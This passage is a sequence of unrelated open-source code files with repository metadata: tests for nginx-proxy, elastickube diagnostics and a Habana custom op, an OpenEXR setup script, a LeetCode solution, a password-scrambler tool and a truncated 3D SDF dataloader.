nginx-proxy/nginx-proxy
|
66ff7a686acedd90545f5cf0a516aa6e812a6225
|
67ab97ed64875e9b671039903ce4c3a94d848b33
|
refs/heads/main
| 2023-09-06T06:20:24.081133
| 2023-09-04T07:05:03
| 2023-09-04T07:05:03
| 19,463,625
| 5,372
| 1,050
|
MIT
| 2023-09-11T04:17:40
| 2014-05-05T17:01:40
|
Python
|
UTF-8
|
Python
| false
| false
| 2,377
|
py
|
test_events.py
|
"""
Test that nginx-proxy detects new containers
"""
from time import sleep
import pytest
from docker.errors import NotFound
@pytest.fixture()
def web1(docker_compose):
"""
pytest fixture creating a web container with `VIRTUAL_HOST=web1.nginx-proxy` listening on port 81.
"""
container = docker_compose.containers.run(
name="web1",
image="web",
detach=True,
environment={
"WEB_PORTS": "81",
"VIRTUAL_HOST": "web1.nginx-proxy"
},
ports={"81/tcp": None}
)
sleep(2) # give it some time to initialize and for docker-gen to detect it
yield container
try:
docker_compose.containers.get("web1").remove(force=True)
except NotFound:
pass
@pytest.fixture()
def web2(docker_compose):
"""
pytest fixture creating a web container with `VIRTUAL_HOST=nginx-proxy`, `VIRTUAL_PATH=/web2/` and `VIRTUAL_DEST=/` listening on port 82.
"""
container = docker_compose.containers.run(
name="web2",
image="web",
detach=True,
environment={
"WEB_PORTS": "82",
"VIRTUAL_HOST": "nginx-proxy",
"VIRTUAL_PATH": "/web2/",
"VIRTUAL_DEST": "/",
},
ports={"82/tcp": None}
)
sleep(2) # give it some time to initialize and for docker-gen to detect it
yield container
try:
docker_compose.containers.get("web2").remove(force=True)
except NotFound:
pass
def test_nginx_proxy_behavior_when_alone(docker_compose, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/")
assert r.status_code == 503
def test_new_container_is_detected_vhost(web1, nginxproxy):
r = nginxproxy.get("http://web1.nginx-proxy/port")
assert r.status_code == 200
assert "answer from port 81\n" == r.text
web1.remove(force=True)
sleep(2)
r = nginxproxy.get("http://web1.nginx-proxy/port")
assert r.status_code == 503
def test_new_container_is_detected_vpath(web2, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/web2/port")
assert r.status_code == 200
assert "answer from port 82\n" == r.text
r = nginxproxy.get("http://nginx-proxy/port")
assert r.status_code in [404, 503]
web2.remove(force=True)
sleep(2)
r = nginxproxy.get("http://nginx-proxy/web2/port")
assert r.status_code == 503
|
7587f14f5bbf6cdcead90a96431a8b9a28d08fd7
|
cd9d6c3de853e9e2f1a4d4730b58a574052d8e0c
|
/j1b/verilator/shell.py
|
a1065802b69bea6c34cdc08331f19dbc9b3d3985
|
[
"BSD-3-Clause"
] |
permissive
|
jamesbowman/swapforth
|
d4f315a59a9bdfd4ee63af0bc4131b821c2b8166
|
8dbff77d7b8ecd6574926a2e128aa76d3e5450fd
|
refs/heads/master
| 2022-11-18T07:38:25.265422
| 2021-10-11T14:05:24
| 2021-10-11T14:05:24
| 37,439,378
| 281
| 65
|
BSD-3-Clause
| 2022-10-19T19:40:50
| 2015-06-15T02:33:15
|
Forth
|
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
shell.py
|
from __future__ import print_function
import sys
from datetime import datetime
import time
import array
import struct
import os
sys.path.append("build/lib/python/")
import vsimj1b
sys.path.append("../../shell")
import swapforth
class TetheredJ1b(swapforth.TetheredTarget):
cellsize = 4
def open_ser(self, port, speed):
self.ser = vsimj1b.vsimj1b()
def reset(self):
ser = self.ser
ser.reset()
for c in ' 1 tth !':
ser.write(c)
ser.write('\r')
while 1:
c = ser.read(1)
# print(repr(c))
if c == b'\x1e':
break
def boot(self, bootfile = None):
sys.stdout.write('Contacting... ')
self.reset()
print('established')
def interrupt(self):
self.reset()
def serialize(self):
l = self.command_response('0 here dump')
lines = l.strip().replace('\r', '').split('\n')
s = []
for l in lines:
l = l.split()
s += [int(b, 16) for b in l[1:17]]
s = array.array('B', s).tobytes().ljust(32768, bytearray((0xff,)))
return array.array('i', s)
if __name__ == '__main__':
swapforth.main(TetheredJ1b)
|
4025c43023cc785922efe9de3336f7c52c4ef99f
|
0882ed3c9e1078a8f69a1fc720d2c05c9289dd23
|
/src/wrappers/python/setup.py
|
e92ba454ba89e99b8629e24ad2249eb7a2e78e7e
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
AcademySoftwareFoundation/openexr
|
846500ee441cc7b60d717ca4377050c55949ecde
|
1ee0ffec3a499ac8bae1ad7e5eff60571d1d83de
|
refs/heads/main
| 2023-09-01T11:33:55.842765
| 2023-08-31T20:30:32
| 2023-08-31T20:30:32
| 3,533,348
| 782
| 281
|
BSD-3-Clause
| 2023-09-14T20:59:10
| 2012-02-24T06:30:00
|
C
|
UTF-8
|
Python
| false
| false
| 2,938
|
py
|
setup.py
|
from setuptools import setup, Extension
import os
import platform
import re
DESC = """Python bindings for the OpenEXR image file format.
This is a script to autobuild the wheels using github actions. Please, do not
use it manually
If you detect any problem, please feel free to report the issue on the GitHub
page:
https://github.com/AcademySoftwareFoundation/openexr/issues
"""
version = []
with open('src/lib/OpenEXRCore/openexr_version.h', 'r') as f:
txt = f.read()
for name in ('MAJOR', 'MINOR', 'PATCH'):
version.append(re.search(
f'VERSION_{name} ([0-9]*)', txt).group(0).split(' ')[-1])
version_major, version_minor, version_patch = version
version = f"{version_major}.{version_minor}.{version_patch}"
libs=[]
libs_static=[f'OpenEXR-{version_major}_{version_minor}',
f'IlmThread-{version_major}_{version_minor}',
f'Iex-{version_major}_{version_minor}',
f'Imath-{version_major}_{version_minor}',
f'OpenEXRCore-{version_major}_{version_minor}'
]
definitions = [('PYOPENEXR_VERSION_MAJOR', f'{version_major}'),
('PYOPENEXR_VERSION_MINOR', f'{version_minor}'),
('PYOPENEXR_VERSION_PATCH', f'{version_patch}'),]
if platform.system() == "Windows":
definitions = [('PYOPENEXR_VERSION', f'\\"{version}\\"')]
extra_compile_args = []
if platform.system() == 'Darwin':
extra_compile_args += ['-std=c++11',
'-Wc++11-extensions',
'-Wc++11-long-long']
libs_dir = "./openexr.install/lib/"
if not os.path.isdir(libs_dir):
libs_dir = "./openexr.install/lib64/"
if platform.system() == "Windows":
extra_link_args = [libs_dir + lib + ".lib"
for lib in libs_static]
extra_link_args = extra_link_args + [
"ws2_32.lib", "dbghelp.lib", "psapi.lib", "kernel32.lib", "user32.lib",
"gdi32.lib", "winspool.lib", "shell32.lib", "ole32.lib",
"oleaut32.lib", "uuid.lib", "comdlg32.lib", "advapi32.lib"]
else:
extra_link_args = [libs_dir + "lib" + lib + ".a"
for lib in libs_static]
setup(name='OpenEXR',
author = 'Contributors to the OpenEXR Project',
author_email = 'info@openexr.com',
url = 'https://github.com/AcademySoftwareFoundation/openexr',
description = "Python bindings for the OpenEXR image file format",
long_description = DESC,
version=version,
ext_modules=[
Extension('OpenEXR',
['OpenEXR.cpp'],
language='c++',
define_macros=definitions,
include_dirs=['./openexr.install/include/OpenEXR',
'./openexr.install/include/Imath',],
libraries=libs,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
],
py_modules=['Imath'],
)
|
254f15fae96dd4049a4633f4c6e2a1f761f1cf9c
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/detect-pattern-of-length-m-repeated-k-or-more-times.py
|
8c3057cfba09f394f57058b4441912b1d8323a27
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 449
|
py
|
detect-pattern-of-length-m-repeated-k-or-more-times.py
|
# Time: O(n)
# Space: O(1)
class Solution(object):
def containsPattern(self, arr, m, k):
"""
:type arr: List[int]
:type m: int
:type k: int
:rtype: bool
"""
cnt = 0
for i in xrange(len(arr)-m):
if arr[i] != arr[i+m]:
cnt = 0
continue
cnt += 1
if cnt == (k-1)*m:
return True
return False
|
723d208d637b9c8386c1c84034c80bbdbdadb0f2
|
363789ea76e72b7ca571ca34e9b7f4e126d8fa15
|
/src/tests/diagnostics/diagnostics_test.py
|
ba7d0aed8d53ebac62d25c3598fb641bd56db5f0
|
[
"Apache-2.0"
] |
permissive
|
ElasticBox/elastickube
|
d6a4ffc7d524930c0078bd4688908a1e42840455
|
8ef9ebaaa62559bc896a1b7517688aaf1db3e464
|
refs/heads/master
| 2020-05-22T05:42:34.102362
| 2017-05-03T13:09:24
| 2017-05-03T13:09:24
| 53,607,662
| 193
| 51
| null | 2017-05-16T13:47:04
| 2016-03-10T18:32:07
|
CSS
|
UTF-8
|
Python
| false
| false
| 17,211
|
py
|
diagnostics_test.py
|
"""
Copyright 2016 ElasticBox All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import, unicode_literals
import copy
import json
import os
from concurrent.futures import Future
import mock
import pytest
try:
from diagnostics import diagnostics
except ImportError:
pass
SAMPLE_TOKEN = (
'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2a'
'WNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZWZ'
'hdWx0LXRva2VuLTZ5ZHB1Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImRlZmF1bHQiLCJrd'
'WJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyZDZhOGFkZC1mNzQ3LTExZTUtYjQyZC0wODAwMjdmZjN'
'hNmUiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06ZGVmYXVsdCJ9.PQVUwcrHlZbI_I6-LQgqukMrY1-8-ZkEZLpq'
'VqhN7tZVTKTcxTyuG4BP8vnCa_BOzX6atvmx5XRw7bgcs4K34Tk-r1S8G4HsD6_z0U95wz-nS6sTm0vOXkcZGoGiLRAmwV4-8oLEzTlQWN35zs'
'pX3YeUsuUEg3WSOLRUI7vDV911dJgAISP8DJ9t9ZwtCrtT9afzb4Kxqk-E-7QqOkqIxPGDwQQodLTiW8LzMDHd-wO5x0C_LFa2lXg8KgwY_xeb'
'1wApMxgU-rl3RrIRac48CYQnGG-PgDwPdPltRDoex-j2mKuMm682fkmtERjYCtq2mmnHsG5Zhqz4TLXKHc4qkQ')
SAMPLE_REPLICATION_CONTROLLER = {
"kind": "ReplicationController",
"apiVersion": "v1",
"metadata": {
"name": "elastickube-server",
"namespace": "kube-system",
"selfLink": "/api/v1/namespaces/kube-system/replicationcontrollers/elastickube-server",
"uid": "8a7ac7cd-fa5a-11e5-9085-080027ff3a6e",
"resourceVersion": "8319",
"generation": 1,
"creationTimestamp": "2016-04-04T11:44:08Z",
"labels": {
"name": "elastickube-server"
}
},
"spec": {
"replicas": 1,
"selector": {
"name": "elastickube-server"
},
"template": {
"metadata": {
"creationTimestamp": None,
"labels": {
"name": "elastickube-server"
}
},
"spec": {
"volumes": [
{
"name": "elastickube-code",
"hostPath": {
"path": "/opt/elastickube/src"
}
},
{
"name": "elastickube-charts",
"hostPath": {
"path": "/var/elastickube/charts"
}
},
{
"name": "elastickube-run",
"hostPath": {
"path": "/var/run/elastickube"
}
},
{
"name": "elasticbox-home-user",
"hostPath": {
"path": "/home/elasticbox"
}
}
],
"containers": [
{
"name": "elastickube-api",
"image": "elasticbox/elastickube-api:latest",
"resources": {
"limits": {
"cpu": "100m",
"memory": "128Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-run",
"mountPath": "/var/run"
},
{
"name": "elasticbox-home-user",
"mountPath": "/home/elasticbox"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
},
{
"name": "elastickube-charts",
"image": "elasticbox/elastickube-charts:latest",
"resources": {
"limits": {
"cpu": "50m",
"memory": "64Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-charts",
"mountPath": "/var/elastickube/charts"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
},
{
"name": "elastickube-nginx",
"image": "elasticbox/elastickube-nginx:latest",
"ports": [
{
"name": "http",
"hostPort": 80,
"containerPort": 80,
"protocol": "TCP"
}
],
"resources": {
"limits": {
"cpu": "10m",
"memory": "32Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-run",
"mountPath": "/var/run"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
}
],
"restartPolicy": "Always",
"terminationGracePeriodSeconds": 30,
"dnsPolicy": "ClusterFirst",
"securityContext": {}
}
}
},
"status": {
"replicas": 1,
"fullyLabeledReplicas": 1,
"observedGeneration": 1
}
}
@pytest.fixture
def token_path(tmpdir):
token_file = tmpdir.join('token_content')
token_file.write(SAMPLE_TOKEN)
return str(token_file)
@pytest.fixture
def env(token_path):
return {'KUBERNETES_SERVICE_PORT': '8080',
'KUBERNETES_SERVICE_HOST': '10.107.56.115',
'KUBE_API_TOKEN_PATH': token_path,
'DNS_TEST_HOSTNAME': 'google.com', # Use a public DNS not kubernetes.default for testing outside kubernetes
'HEAPSTER_SERVICE_HOST': '10.0.127.162',
'HEAPSTER_SERVICE_PORT': '80',
}
@pytest.fixture
def settings():
return {'kubernetes_url': 'http://10.107.56.115:8080', 'token': SAMPLE_TOKEN,
'check_connectivity_url': 'http://google.com', 'dns_test_hostname': 'google.com',
'HEAPSTER_SERVICE_HOST': '10.0.127.162', 'HEAPSTER_SERVICE_PORT': '80',
'KUBERNETES_SERVICE_HOST': '10.107.56.115', 'KUBERNETES_SERVICE_PORT': '8080',
}
@pytest.fixture
def replica_names():
return [
('kube-system', 'elastickube-server'),
('kube-system', 'elastickube-mongo'),
]
@pytest.fixture
def status(replica_names):
return diagnostics.SystemStatus(replica_names)
@pytest.fixture
def status_ok(status):
status.internet = diagnostics.status_ok()
status.kubernetes = diagnostics.status_ok()
status.dns = diagnostics.status_ok()
status.heapster = diagnostics.status_ok()
for name in status.rcs:
status.rcs[name] = diagnostics.status_ok()
return status
@pytest.fixture
def app(status):
statics_path = os.path.join(os.path.dirname(__file__), 'assets')
return diagnostics.create_application(status, statics_path, debug=False)
@pytest.fixture
def rc_document():
return copy.deepcopy(SAMPLE_REPLICATION_CONTROLLER)
def test_settings_from_env_http(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '80'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'http://10.107.56.115:80'
def test_settings_from_env_custom_port(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '8080'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'http://10.107.56.115:8080'
def test_settings_from_env_https(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '443'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'https://10.107.56.115:443'
def test_settings_from_env_missing_kube_api_key(env):
settings = {}
del env['KUBE_API_TOKEN_PATH']
diagnostics.settings_from_env(settings, env)
assert settings['token'] is None
def test_default_settings_connectivity_url(env):
settings = {}
env['CHECK_CONNECTIVITY_URL'] = 'TEST_URL.COM'
diagnostics.settings_from_env(settings, env)
assert settings['check_connectivity_url'] == 'TEST_URL.COM'
def test_default_settings_dns(env):
settings = {}
env['DNS_TEST_HOSTNAME'] = 'TEST_URL.COM'
diagnostics.settings_from_env(settings, env)
assert settings['dns_test_hostname'] == 'TEST_URL.COM'
def test_default_settings_from_default_env(env, settings):
base_settings = {}
diagnostics.settings_from_env(base_settings, env)
assert base_settings == settings
# System status tests
def test_system_status_initial(status):
serialized_status = json.dumps(status.to_view())
assert 'internet' in serialized_status
assert 'kubernetes' in serialized_status
assert 'dns' in serialized_status
for rc in status.rcs:
assert rc in serialized_status
def test_system_status_custom_replica_name():
replica_names = (
('namespace', 'name'),
)
s = diagnostics.SystemStatus(replica_names)
serialized_status = s.to_view()
assert 'namespace.name' in serialized_status
assert 'internet' in serialized_status
assert 'kubernetes' in serialized_status
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_kubernetes_status(settings):
status = yield diagnostics._check_kubernetes_status(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test
def test_check_kubernetes_status_wrong_answer(settings):
with mock.patch('diagnostics.diagnostics._get_json') as get_json:
get_json.side_effect = IOError('Cannot connect')
status = yield diagnostics._check_kubernetes_status(settings)
assert status['reason'] == 'Cannot connect'
assert status['status'] is False
@pytest.mark.gen_test
def test_check_kubernetes_status_wrong_request(settings):
with mock.patch('diagnostics.diagnostics._get_json') as get_json:
get_json.return_value = {}
status = yield diagnostics._check_kubernetes_status(settings)
assert 'Missing' in status['reason']
assert status['status'] is False
def test_document_rc_status_ok(rc_document):
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == ''
assert status['status'] is True
def test_document_rc_status_missing_replicas(rc_document):
rc_document['status']['replicas'] = 0
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 0, desired 1'
assert status['status'] is False
def test_document_rc_status_too_many_replicas(rc_document):
rc_document['status']['replicas'] = 2
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 2, desired 1'
assert status['status'] is False
def test_document_rc_status_wrong_replicaset(rc_document):
rc_document['spec']['replicas'] = 2
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 1, desired 2'
assert status['status'] is False
def test_document_rc_status_wrong_no_replicas(rc_document):
del rc_document['spec']['replicas']
status = diagnostics._document_rc_status(rc_document)
assert 'Wrong replication controller document' in status['reason']
assert status['status'] is False
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_rcs_ok(settings, replica_names):
for namespace, name in replica_names:
status = yield diagnostics._check_replicaset(settings, namespace, name)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_internet(settings):
status = yield diagnostics._check_internet(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_dns(settings):
status = yield diagnostics._check_dns(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test
def test_check_internet_ioerror(settings):
settings['check_connectivity_url'] = 'test_url'
with mock.patch('diagnostics.diagnostics.tornado.httpclient.AsyncHTTPClient') as client:
fut = Future()
fut.set_exception(IOError('ERROR TEST'))
client.return_value.fetch.return_value = fut
status = yield diagnostics._check_internet(settings)
assert 'ERROR TEST' in status['reason']
assert 'test_url' in status['reason']
assert status['status'] is False
@pytest.mark.gen_test
def test_check_internet_wrong_status_code(settings):
settings['check_connectivity_url'] = 'test_url'
with mock.patch('diagnostics.diagnostics.tornado.httpclient.AsyncHTTPClient') as client:
result = mock.MagicMock()
result.code = 555
fut = Future()
fut.set_result(result)
client.return_value.fetch.return_value = fut
status = yield diagnostics._check_internet(settings)
assert '555' in status['reason']
assert status['status'] is False
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_replicaset_ok(settings):
status = yield diagnostics._check_replicaset(settings, 'kube-system', 'elastickube-server')
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_html_initializing(http_client, base_url):
response = yield http_client.fetch(base_url)
# assert app is None
assert response.code == 200
assert 'Diagnostics' in response.body
assert 'Initializing' in response.body
@pytest.mark.gen_test(run_sync=False)
def test_application_json_initializing(http_client, base_url, status):
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
for _, status in data.items():
assert status['status'] is None # Initializing
@pytest.mark.gen_test(run_sync=False)
def test_application_json_internet_ok(http_client, base_url, status):
status.internet = diagnostics.status_ok()
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
assert data['internet']['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_json_rcs_ok(http_client, base_url, status_ok):
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
for name in data:
assert data[name]['reason'] == ''
assert data[name]['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_json_kubernetes_no_ok(http_client, base_url, status):
status.kubernetes = diagnostics.status_error('Failed to connect')
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
assert data['kubernetes']['status'] is False
assert data['kubernetes']['reason'] == 'Failed to connect'
for name in status.rcs:
assert data[name]['status'] is None
|
260a60669f3d12e8a8a7a789e603b2707d9c0631
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/resource/_color.py
|
c660ed86c65196d28773fa3c79769eb67f144b81
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
_color.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from collections import deque
class Color(Enum):
ORANGE = "\033[38;5;208m"
GREEN = "\033[38;5;77m"
PURPLE = "\033[38;5;141m"
BLUE = "\033[38;5;39m"
GRAY = "\033[38;5;246m"
RESET = "\033[0m"
def __str__(self):
return self.value
class ColoredStringBuilder:
def __init__(self, enable_color=True):
self._enable_color = enable_color
self._contents = []
self._colors = deque()
def build(self):
return "".join(self._contents)
def append(self, value, color=None):
if color:
self._push_color(color)
self._contents.append(str(value))
if color:
self._pop_color()
return self
def append_line(self, value="", color=None):
self.append(f"{str(value)}\n", color)
return self
def new_color_scope(self, color):
return self.ColorScope(self, color)
def _push_color(self, color):
if not self._enable_color:
return
self._colors.append(color)
self._contents.append(str(color))
def _pop_color(self):
if not self._enable_color:
return
self._colors.pop()
self._contents.append(str(self._colors[-1] if self._colors else Color.RESET))
# pylint: disable=protected-access
class ColorScope:
def __init__(self, color_string_builder, color):
self._colored_string_builder = color_string_builder
self._color = color
def __enter__(self):
self._colored_string_builder._push_color(self._color)
def __exit__(self, *args):
self._colored_string_builder._pop_color()
|
04a5694e003a67ac749d1e13426eea356d291694
|
a960e38868b3a157179bb576ac78b0f144140ed8
|
/PyTorch/examples/custom_op/custom_topk/hpu_custom_op_topk_test.py
|
1145a093a94d152c05ad2b68331f0479e650afdc
|
[] |
no_license
|
HabanaAI/Model-References
|
d339b211adf8be9575ebb1e3bb6afd6cd04312e6
|
3ca77c4a5fb62c60372e8a2839b1fccc3c4e4212
|
refs/heads/master
| 2023-08-17T06:32:28.714253
| 2023-08-14T15:22:08
| 2023-08-14T15:22:08
| 288,377,272
| 108
| 53
| null | 2023-08-18T02:30:16
| 2020-08-18T06:45:50
|
Python
|
UTF-8
|
Python
| false
| false
| 474
|
py
|
hpu_custom_op_topk_test.py
|
import torch
import habana_frameworks.torch.core
def test_custom_div_op_function(custom_op_lib_path):
torch.ops.load_library(custom_op_lib_path)
print(torch.ops.custom_op.custom_topk)
a_cpu = torch.rand((6, 6))
a_hpu = a_cpu.to('hpu')
a_topk_hpu, a_topk_indices_hpu = torch.ops.custom_op.custom_topk(a_hpu, 3, 1, False)
a_topk_cpu, a_topk_indices_cpu = a_cpu.topk(3, 1)
assert(torch.equal(a_topk_hpu.detach().cpu(), a_topk_cpu.detach().cpu()))
|
9fdadcd130ef824b59b6bcb9263fe7ace917551d
|
77cc80b19d7530eed54b389bc288ed0b7331f49a
|
/passcrambler.py
|
67311bc9742968f15f6d5d0b9112869cd8965f9f
|
[
"BSD-2-Clause"
] |
permissive
|
hasherezade/password_scrambler
|
d976a7dd876f13ca8a7b335c5a51798adeec1143
|
0bb1dd06ee8d7619ef6be69fa962b91e522258d1
|
refs/heads/master
| 2023-01-09T14:55:11.963856
| 2023-01-02T17:52:00
| 2023-01-02T17:52:00
| 42,003,726
| 127
| 44
|
BSD-2-Clause
| 2021-05-26T03:19:48
| 2015-09-06T13:33:37
|
Python
|
UTF-8
|
Python
| false
| false
| 4,183
|
py
|
passcrambler.py
|
#!/usr/bin/env python3
import argparse
import getpass
import base64
import hashlib
import pyperclip
from Crypto.Cipher import AES
# AES:
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size).encode()
def aes_encrypt(seed, key, raw):
raw = pad(raw)
iv = seed[0:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw))
def scramble(key, func='md5'):
try:
# AES key must be either 16, 24, or 32 bytes long
proper_key = len(eval('hashlib.%s(key).digest()' % func))
if proper_key >= 32:
return eval('hashlib.%s(key).digest()[:32]' % func)
elif 24 <= proper_key < 32:
return eval('hashlib.%s(key).digest()[:24]' % func)
elif 16 <= proper_key < 24:
return eval('hashlib.%s(key).digest()[:16]' % func)
else:
print(f"[ERROR]: Key length {proper_key} is to small. Please select a different hash function.")
except Exception as e:
print(f"[ERROR]: {e}")
def convert_to_charset(password, specialchars):
output = ""
i = 0
slen = len(specialchars)
for c in password:
c = chr(c)
if c.isalnum():
output += c
else:
output += specialchars[i % slen]
i += 1
return output
def main():
try:
f_choices = sorted(list(hashlib.algorithms_guaranteed))
parser = argparse.ArgumentParser(description="Password scrambler")
parser.add_argument('--file', dest="file", default=None, help="File used to initialize generation",
required=True)
parser.add_argument('--login', dest="login", default=None, help="Login for which you want to use the password",
required=True)
parser.add_argument('--special', dest="special", default="_&#",
help="Whitelist of special characters (e.g. '_&#'), default='_&#'")
parser.add_argument('--length', dest="length", default=30, help="Length of the password, default=30", type=int)
parser.add_argument('--loop', dest="loop", default=1, help="How many times the hashing function will be executed, default=1", type=int)
parser.add_argument('--clip', dest="clip", default=False,
help="Copy the generated password into the clipboard instead of displaying", required=False,
action="store_true")
parser.add_argument('--scramble-func', dest="func", default='md5', choices=f_choices,
help="Hashing function to use for input data scrambling, default=md5")
args = parser.parse_args()
# First thing first, fail if seed file does not exist
with open(args.file, 'rb') as fd:
raw = fd.read()
# get the loop parameter, default to 1 if not set
loop = args.loop if (args.loop > 0) else 1
password = getpass.getpass()
key = password.encode("utf-8")
vec = args.login.encode("utf-8")
for _ in range(loop):
key = scramble(key, args.func)
vec = scramble(vec, args.func)
aes_out1 = aes_encrypt(vec, key, raw)
sha_digest = hashlib.sha512(aes_out1).digest()
passlen = len(password) % len(sha_digest)
key2 = sha_digest[passlen: passlen + 32]
aes_out2 = aes_encrypt(key, key2, aes_out1)
start = key[0] % len(aes_out2)
portion = aes_out2[start:]
result = portion
for x in range(loop):
result = hashlib.sha512(result).digest()
longpass = base64.b64encode(result)
longpass = longpass[0:args.length]
longpass = convert_to_charset(longpass, sorted(args.special, reverse=True))
print("---")
if not args.clip:
print(longpass)
print("---")
else:
pyperclip.copy(longpass)
print("[INFO]: The generated password is in your clipboard.")
except Exception as e:
print(f"[ERROR]: {e}")
if __name__ == "__main__":
main()
|
c8d2feae2e9733fff7340f5951d1b61c8c9f4792
|
ef870111eb0e5403b3bfd07867455a5b4715b683
|
/3D/levelset_data.py
|
541e0e5168e248a3a08dbc76e4952df288430e0a
|
[] |
no_license
|
vsitzmann/metasdf
|
93203b819d4adb375854ea56844f830414295d8f
|
56d0c6e411d23523bd638aa0ad37c0c2c9dbdb9d
|
refs/heads/master
| 2023-02-12T00:16:35.951907
| 2021-01-16T00:25:44
| 2021-01-16T00:25:44
| 293,341,779
| 131
| 15
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,170
|
py
|
levelset_data.py
|
"""
Dataloaders for 3D experiments. Based on code from DeepSDF (Park et al.)
"""
import time
import plyfile
import glob
import logging
import numpy as np
import os
import random
import torch
import torch.utils.data
import trimesh
import skimage.measure
def get_instance_filenames(data_source, split):
npzfiles = []
for dataset in split:
for class_name in split[dataset]:
for instance_name in split[dataset][class_name]:
instance_filename = os.path.join(
dataset, class_name, instance_name + ".npz"
)
#levelset_filename = os.path.splitext(os.path.join(self.data_source, 'SurfaceSamples', self.npyfiles[new_idx]))[0] + '.ply'
#normalization_filename = os.path.join(self.data_source, 'NormalizationParameters', self.npyfiles[new_idx])
if not os.path.isfile(
os.path.join(data_source, 'SdfSamples', instance_filename)
):
continue
if not os.path.isfile(
os.path.join(data_source, 'NormalizationParameters', instance_filename)):
continue
if not os.path.isfile(
